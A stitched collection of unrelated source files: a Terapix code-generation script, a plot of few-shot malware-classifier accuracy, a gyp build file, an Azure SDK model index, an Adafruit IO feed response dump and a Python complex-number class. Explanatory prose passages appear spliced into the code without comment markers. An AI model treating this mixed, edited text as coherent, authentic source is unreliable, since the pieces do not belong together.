# Source: packages/PIPS/validation/Terapix/convol3x3.py (repo: DVSR1966/par4all, MIT license)
from __future__ import with_statement # this is to work with python2.5
import terapyps
from pyps import workspace
workspace.delete("convol3x3")
with terapyps.workspace("convol3x3.c", name="convol3x3", deleteOnClose=False,recoverInclude=False) as w:
for f in w.fun:
f.terapix_code_generation(debug=True)
# w.compile(terapyps.Maker())
# Source: visualization/bar_line_hybrid.py (repo: Asichurter/APISeqFewShot, MIT license)
import numpy as np
import matplotlib.pyplot as plt
# plt.style.use('ggplot')
''' Shot Accuracy Plot
ticks = [5,6,7,8,9,10,11,12,13,14,15]#[1,2,3,4,5]
data_lists = [
[92.35,92.52,93.2,93.71,93.85,94.15,94.22,94.37,94.68,94.73,94.82],
[89.15,89.74,90.41,90.88,91.31,91.47,91.84,92.03,92.2,92.3,92.48],
[86.13,86.98,87.8,88.15,88.71,89.22,89.43,89.6,89.87,90.05,90.16],
[80.04,81.38,82.39,83.09,83.61,84.21,84.6,85.16,85.35,85.79,85.99]
]#[[0.4,1.2,2.3,4,5.5]]
label_lists = [
'VirusShare_00177 5-way',
'VirusShare_00177 10-way',
'APIMDS 5-way',
'APIMDS 10-way'
]#['test1']
color_lists = ['red', 'red', 'royalblue', 'royalblue'] #['red']
marker_lists = ['o', '^', 'o', "^"]#['.']
'''
acc_data_lists = [
[91.04,91.71,92.11,92.35,91.8,91.55,90.71,91.05,90.22,90.12, 91.13, 90.32, 90.48, 90.84, 90.42, 91.14, 90.49, 90.49, 90.87, 90.77],
[87.44, 88.64, 88.7, 89.15, 88.07, 87.88, 87.77, 87.64, 87.46, 87.02, 86.93, 87.05, 86.87, 87.43, 87.56, 87.72, 87.38, 86.98, 87.31, 87.28]
]
time_data_lists = [
[14.2, 19.6, 25.1, 29.4, 36.9, 42.4, 48.8, 53.6, 58.6, 64.5, 70.1, 75.1, 80.5, 83.2, 90.5, 93.4, 100.6, 106.1, 111.5, 115.6],
[22.4, 32.0, 41.1, 50.2, 61.5, 71.4, 79.9, 89.8, 98.8, 108.5, 116.3, 122.4, 131.8, 142.6, 154.5, 164.3, 170.7, 187.9, 195.2, 201.9]
]
acc_label_lists = [
"VirusShare_00177 5-shot 5-way accuracy",
"VirusShare_00177 5-shot 10-way accuracy",
# "APIMDS 5-shot 5-way",
# "APIMDS 5-shot 10-way"
]
time_label_list = [
"VirusShare_00177 5-shot 5-way test time per episode",
"VirusShare_00177 5-shot 10-way test time per episode"
]
color_lists = ['orange', 'green']
marker_lists = ['s', 's']
bar_width = 10
ticks = np.arange(50, 1050, 50)
num_list = len(time_data_lists)
bar_ticks = [
np.arange(50, 1050, 50) - (num_list/2 - i - 0.5) * bar_width
for i in range(num_list)
]
marker_size = 6
title = ''
x_title = 'Sequence Length'
acc_y_title = 'Accuracy(%)'
time_y_title = 'ms / Episode'
fig_size = (15,6)
dpi = 300
fig = plt.figure(figsize=fig_size, dpi=dpi)
plt.xticks(ticks)
plt.title(title)
# plt.xlabel(x_title)
# plt.ylabel(y_title)
plt.grid(True, axis='y')
acc_axis = fig.add_subplot(111)
time_axis = acc_axis.twinx()
acc_axis.set_xlabel('Maximum Sequence Length')
acc_axis.set_ylabel(acc_y_title)
time_axis.set_ylabel(time_y_title)
acc_axis.set_ylim(75, 95)
time_axis.set_ylim(0, 350)
for acc_data, time_data, bar_tick, acc_label, time_label, color, marker in zip(acc_data_lists, time_data_lists, bar_ticks, acc_label_lists, time_label_list, color_lists, marker_lists):
acc_axis.plot(ticks, acc_data, color=color, marker=marker, label=acc_label, markersize=marker_size)
    time_axis.bar(bar_tick, time_data, color=color, width=bar_width, label=time_label, zorder=2)
acc_axis.legend(loc='upper left')
time_axis.legend(loc='upper right')
# plt.legend()
plt.show()
# plt.savefig('C:/Users/Asichurter/Desktop/截图/virushare.jpg', format='JPEG', dpi=300)
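The `bar_ticks` expression above shifts series `i` by `-(num_list/2 - i - 0.5) * bar_width` so the grouped bars straddle each shared tick symmetrically. The offset arithmetic can be checked without matplotlib:

```python
bar_width = 10
num_list = 2
ticks = [50, 100]

# Same formula as in the script: series i is shifted so the group centers on the tick.
bar_ticks = [[t - (num_list / 2 - i - 0.5) * bar_width for t in ticks]
             for i in range(num_list)]

assert bar_ticks[0] == [45.0, 95.0]    # first series sits half a bar left of the tick
assert bar_ticks[1] == [55.0, 105.0]   # second series sits half a bar right
```

With two series and a width of 10, the bars meet exactly at the tick, which is why the line markers plotted on the twin accuracy axis land visually between each pair of bars.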
# Source: examples-rust/example1/binding.gyp (repo: aqrln/jsfest2019-napi-rust, MIT license)
{
'targets': [
{
'target_name': 'example1',
'sources': ['manifest.c'],
'libraries': [
'../../target/release/libnapi_example1.a',
],
'include_dirs': [
'../napi/include'
]
}
]
}
e41ba32b99f78bd45f179b7fc569830496a91628 | 2,381 | py | Python | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/models/__init__.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | 1 | 2022-02-01T18:50:12.000Z | 2022-02-01T18:50:12.000Z | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/models/__init__.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | null | null | null | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/models/__init__.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._models_py3 import DiagnosticSettingsCategoryResource
from ._models_py3 import DiagnosticSettingsCategoryResourceCollection
from ._models_py3 import DiagnosticSettingsResource
from ._models_py3 import DiagnosticSettingsResourceCollection
from ._models_py3 import ErrorResponse
from ._models_py3 import LocalizableString
from ._models_py3 import LogSettings
from ._models_py3 import MetadataValue
from ._models_py3 import Metric
from ._models_py3 import MetricAvailability
from ._models_py3 import MetricDefinition
from ._models_py3 import MetricDefinitionCollection
from ._models_py3 import MetricSettings
from ._models_py3 import MetricValue
from ._models_py3 import ProxyOnlyResource
from ._models_py3 import Response
from ._models_py3 import RetentionPolicy
from ._models_py3 import SubscriptionDiagnosticSettingsResource
from ._models_py3 import SubscriptionDiagnosticSettingsResourceCollection
from ._models_py3 import SubscriptionLogSettings
from ._models_py3 import SubscriptionProxyOnlyResource
from ._models_py3 import TimeSeriesElement
from ._monitor_management_client_enums import (
AggregationType,
CategoryType,
ResultType,
Unit,
)
__all__ = [
'DiagnosticSettingsCategoryResource',
'DiagnosticSettingsCategoryResourceCollection',
'DiagnosticSettingsResource',
'DiagnosticSettingsResourceCollection',
'ErrorResponse',
'LocalizableString',
'LogSettings',
'MetadataValue',
'Metric',
'MetricAvailability',
'MetricDefinition',
'MetricDefinitionCollection',
'MetricSettings',
'MetricValue',
'ProxyOnlyResource',
'Response',
'RetentionPolicy',
'SubscriptionDiagnosticSettingsResource',
'SubscriptionDiagnosticSettingsResourceCollection',
'SubscriptionLogSettings',
'SubscriptionProxyOnlyResource',
'TimeSeriesElement',
'AggregationType',
'CategoryType',
'ResultType',
'Unit',
]
| 35.014706 | 94 | 0.755565 | 194 | 2,381 | 9.005155 | 0.381443 | 0.12593 | 0.163709 | 0.239267 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011074 | 0.127677 | 2,381 | 67 | 95 | 35.537313 | 0.830043 | 0.189836 | 0 | 0 | 0 | 0 | 0.271213 | 0.158251 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.410714 | 0 | 0.410714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e424d02c1c6874a3cc7557673665a4fc913a01c4 | 9,390 | py | Python | adafruit_io/adafruit_io_using_requests/feeds_response.py | brucestull/Arduino | 9ae47eabd515fb7d657f00d40b483464eca2dc65 | [
"MIT"
] | 1 | 2021-12-15T02:48:33.000Z | 2021-12-15T02:48:33.000Z | adafruit_io/adafruit_io_using_requests/feeds_response.py | brucestull/Arduino | 9ae47eabd515fb7d657f00d40b483464eca2dc65 | [
"MIT"
] | null | null | null | adafruit_io/adafruit_io_using_requests/feeds_response.py | brucestull/Arduino | 9ae47eabd515fb7d657f00d40b483464eca2dc65 | [
"MIT"
] | null | null | null |
# https://io.adafruit.com/api/v2/{username}/feeds
import pprint
headers = {'server': 'nginx', 'date': 'Sun, 06 Feb 2022 00:40:21 GMT', 'content-type': 'application/json; charset=utf-8', 'transfer-encoding': 'chunked', 'x-frame-options': 'SAMEORIGIN', 'x-xss-protection': '1; mode=block', 'x-content-type-options': 'nosniff', 'x-download-options': 'noopen', 'x-permitted-cross-domain-policies': 'none', 'referrer-policy': 'strict-origin-when-cross-origin', 'x-aio-worker': 'io-rails-1', 'access-control-allow-origin': '*', 'access-control-allow-credentials': 'false', 'access-control-request-method': '*', 'access-control-allow-methods': 'POST, PUT, DELETE, GET, OPTIONS, PATCH', 'access-control-allow-headers': 'DNT, Origin, X-Requested-With, X-AIO-Key, Content-Type, Accept, Authorization', 'access-control-expose-headers': 'X-Pagination-Limit, X-Pagination-Start, X-Pagination-End, X-Pagination-Count, X-Pagination-Total', 'access-control-max-age': '1728000', 'etag': 'W/"21ad7437c7e5f152b1505df7da75930d"', 'cache-control': 'max-age=0, private, must-revalidate', 'x-request-id': '37cbb80b-8925-4f66-89cd-df1bf01b2e62', 'x-runtime': '0.068097', 'content-encoding': 'gzip', 'x-aio-proxy': '1', 'strict-transport-security': 'max-age=31536000', 'permissions-policy': 'interest-cohort=()'}
data = [{'created_at': '2020-02-17T15:07:15Z',
'description': 'Measured temperature by the Si7021. Sensor is connected to '
'Adafruit Feather HUZZAH ESP8266.',
'enabled': True,
'feed_status_changes': [{'created_at': '2021-12-15T01:01:15Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'offline',
'to_status': 'online'},
{'created_at': '2021-11-15T13:40:10Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'online',
'to_status': 'offline'},
{'created_at': '2020-07-11T18:27:23Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'offline',
'to_status': 'online'},
{'created_at': '2020-07-09T20:40:11Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'online',
'to_status': 'offline'}],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1303967,
'key': 'temperatureesp8266',
'last_value': '69.47',
'license': None,
'name': 'Temperature ESP8266',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'online',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2022-02-06T00:39:26Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None},
{'created_at': '2020-02-17T22:04:12Z',
'description': 'Measured humidity by the Si7021. Sensor is connected to '
'Adafruit Feather HUZZAH ESP8266.',
'enabled': True,
'feed_status_changes': [{'created_at': '2021-12-15T01:01:16Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'offline',
'to_status': 'online'},
{'created_at': '2021-11-15T13:40:10Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'online',
'to_status': 'offline'},
{'created_at': '2020-07-11T18:27:23Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'offline',
'to_status': 'online'},
{'created_at': '2020-07-09T20:40:11Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'online',
'to_status': 'offline'}],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1304178,
'key': 'humidityesp8266',
'last_value': '31.4',
'license': None,
'name': 'Humidity ESP8266',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'online',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2022-02-06T00:39:26Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None},
{'created_at': '2021-12-15T01:11:12Z',
'description': 'Measured humidity by the Si7021 sensor connected to Adafruit '
'Feather Huzzah 32.',
'enabled': True,
'feed_status_changes': [],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1767912,
'key': 'humidityesp32',
'last_value': '33.0',
'license': None,
'name': 'Humidity ESP32',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'online',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2022-02-06T00:39:52Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None},
{'created_at': '2021-12-15T01:14:28Z',
'description': 'Measured temperature by the Si7021 sensor connected to '
'Adafruit Feather Huzzah32.',
'enabled': True,
'feed_status_changes': [],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1767913,
'key': 'temperatureesp32',
'last_value': '66.86',
'license': None,
'name': 'Temperature ESP32',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'online',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2022-02-06T00:39:49Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None},
{'created_at': '2021-12-15T01:16:13Z',
'description': 'Measured battery voltage of battery connected to Adafruit '
'Feather Huzzah32.',
'enabled': True,
'feed_status_changes': [],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1767914,
'key': 'batteryvoltageesp32',
'last_value': '4.69',
'license': None,
'name': 'Battery Voltage of ESP32',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'online',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2022-02-06T00:39:55Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None},
{'created_at': '2021-12-16T22:46:17Z',
'description': 'Feed for toggling the LED.',
'enabled': True,
'feed_status_changes': [{'created_at': '2021-12-27T09:40:10Z',
'email_sent': None,
'email_sent_to': None,
'from_status': 'online',
'to_status': 'offline'}],
'feed_webhook_receivers': [],
'group': {'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146},
'groups': [{'id': 55706,
'key': 'feather-iot',
'name': 'FeatherIOT',
'user_id': 63146}],
'history': True,
'id': 1769478,
'key': 'toggle-led',
'last_value': 'ON',
'license': None,
'name': 'Toggle LED',
'owner': {'id': 63146, 'username': 'FlynntKnapp'},
'status': 'offline',
'status_notify': False,
'status_timeout': 4320,
'unit_symbol': None,
'unit_type': None,
'updated_at': '2021-12-27T09:40:10Z',
'username': 'FlynntKnapp',
'visibility': 'public',
'wipper_pin_info': None}]
# pprint.pprint(data)
# print(len(data))
# pprint.pprint(data[0])
# pprint.pprint(data[0]['created_at'])
for data_point in data:
print(data_point['updated_at'])
print(data_point['description'])
print(data_point['id'])
print(data_point['last_value']) | 38.962656 | 1,223 | 0.538552 | 981 | 9,390 | 5 | 0.236493 | 0.033028 | 0.024465 | 0.04159 | 0.666667 | 0.665443 | 0.653619 | 0.641386 | 0.60632 | 0.597554 | 0 | 0.098247 | 0.276997 | 9,390 | 241 | 1,224 | 38.962656 | 0.624245 | 0.015335 | 0 | 0.767544 | 0 | 0.008772 | 0.508658 | 0.055195 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.004386 | 0 | 0.004386 | 0.02193 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e427db39d3949d3b4b0e8b7d7f6cf8c9bff32599 | 2,071 | py | Python | assignment_3/complex.py | slchangtw/Advanced_Programming_in_Python_Jacobs | 46df6a77e23d92fc97c15b6112a3f428b2bbcb42 | [
"MIT"
] | null | null | null | assignment_3/complex.py | slchangtw/Advanced_Programming_in_Python_Jacobs | 46df6a77e23d92fc97c15b6112a3f428b2bbcb42 | [
"MIT"
] | null | null | null | assignment_3/complex.py | slchangtw/Advanced_Programming_in_Python_Jacobs | 46df6a77e23d92fc97c15b6112a3f428b2bbcb42 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# JTSK-350112
# complex.py
# Shun-Lung Chang
# sh.chang@jacobs-university.de
class Complex(object):
def __init__(self, real, imag):
self._real = real
self._imag = imag
def __add__(self, other):
if type(self) != type(other):
            raise TypeError('Type of {0} is not the same as type of {1}'.format(type(self),
                                                                                type(other)))
return Complex(self._real + other._real, self._imag + other._imag)
def __sub__(self, other):
if type(self) != type(other):
            raise TypeError('Type of {0} is not the same as type of {1}'.format(type(self),
                                                                                type(other)))
return Complex(self._real - other._real, self._imag - other._imag)
def __mul__(self, other):
if type(self) != type(other):
            raise TypeError('Type of {0} is not the same as type of {1}'.format(type(self),
                                                                                type(other)))
        return Complex(self._real * other._real - self._imag * other._imag,
                       self._real * other._imag + self._imag * other._real)
def __truediv__(self, other):
if type(self) != type(other):
            raise TypeError('Type of {0} is not the same as type of {1}'.format(type(self),
                                                                                type(other)))
return Complex((self._real * other._real + self._imag * other._imag) /
(other._real ** 2 + other._imag ** 2),
(self._imag * other._real - self._real * other._imag) /
(other._real ** 2 + other._imag ** 2))
def __str__(self):
return "Real Part: {0:.2f}\nImaginary Part: {1:.2f}".format(self._real, self._imag)
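The `__mul__` method above implements the identity (a + bi)(c + di) = (ac − bd) + (ad + bc)i. As a self-contained sanity check of that formula (independent of the `Complex` class; the helper `mul` below is hypothetical, not part of the file), the same arithmetic can be compared against Python's built-in complex type:

```python
# Sanity check of the complex-multiplication identity used in Complex.__mul__:
# (a + bi)(c + di) = (ac - bd) + (ad + bc)i
def mul(real1, imag1, real2, imag2):
    # Returns (real, imag) of the product, mirroring the class formula.
    return (real1 * real2 - imag1 * imag2,
            real1 * imag2 + imag1 * real2)

# Compare against Python's built-in complex arithmetic.
a, b = complex(2, 3), complex(4, -5)
prod = a * b
assert mul(a.real, a.imag, b.real, b.imag) == (prod.real, prod.imag)
print(mul(2, 3, 4, -5))  # (23, 2)
```

This kind of cross-check against the built-in `complex` type catches sign and operand mix-ups in hand-written arithmetic like the one corrected in `__mul__`.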
| 41.42 | 94 | 0.468856 | 222 | 2,071 | 4.121622 | 0.216216 | 0.078689 | 0.104918 | 0.148634 | 0.718033 | 0.718033 | 0.680874 | 0.680874 | 0.627322 | 0.627322 | 0 | 0.019769 | 0.41381 | 2,071 | 50 | 95 | 41.42 | 0.733937 | 0.05408 | 0 | 0.4 | 0 | 0 | 0.099795 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.033333 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e436572a81b7f2dfc45ed253e13b54249a9f1cda | 1,342 | py | Python | think/skills/tests/test_arithmetic.py | kat-dearstyne/think | 1f6de81b694e05996948639b7f7ce14b6dd4ecae | [
"MIT"
] | 2 | 2018-04-18T11:14:19.000Z | 2020-07-23T16:25:41.000Z | think/skills/tests/test_arithmetic.py | kat-dearstyne/think | 1f6de81b694e05996948639b7f7ce14b6dd4ecae | [
"MIT"
] | 1 | 2019-02-08T15:11:50.000Z | 2019-04-30T10:14:46.000Z | think/skills/tests/test_arithmetic.py | kat-dearstyne/think | 1f6de81b694e05996948639b7f7ce14b6dd4ecae | [
"MIT"
] | 1 | 2020-12-20T17:43:40.000Z | 2020-12-20T17:43:40.000Z | # import unittest
# from think import Agent, Arithmetic, Memory, Speech
# class ArithmeticTest(unittest.TestCase):
# def test_arithmetic(self):
# agent = Agent(output=False)
# arithmetic = Arithmetic(agent, Memory(agent), Speech(agent))
# arithmetic.count_to(5)
# self.assertEqual(0, arithmetic.add(0, 0))
# self.assertEqual(5, arithmetic.add(2, 3))
# self.assertEqual(17, arithmetic.add(8, 9))
# self.assertEqual(0, arithmetic.multiply(0, 0))
# self.assertEqual(0, arithmetic.multiply(7, 0))
# self.assertEqual(12, arithmetic.multiply(3, 4))
# self.assertEqual(121, arithmetic.multiply(11, 11))
# class NumbersTest(unittest.TestCase):
# TEST_PAIRS = [(0, "zero"), (1, "one"), (-4, "negative four"),
# (53, "fifty-three"),
# (129, "one hundred twenty-nine"),
# (2463, "two thousand four hundred sixty-three"),
# (7000008, "seven million eight")]
# def test_num_to_text(self):
# agent = Agent()
# arithmetic = Arithmetic(agent, Memory(agent), Speech(agent))
# errors = 0
# for pair in NumbersTest.TEST_PAIRS:
# if arithmetic.num_to_text(pair[0]) != pair[1]:
# errors += 1
# self.assertEqual(errors, 0)
| 35.315789 | 70 | 0.581967 | 151 | 1,342 | 5.112583 | 0.410596 | 0.15544 | 0.062176 | 0.101036 | 0.209845 | 0.121762 | 0.121762 | 0 | 0 | 0 | 0 | 0.053224 | 0.271982 | 1,342 | 37 | 71 | 36.27027 | 0.73695 | 0.95082 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |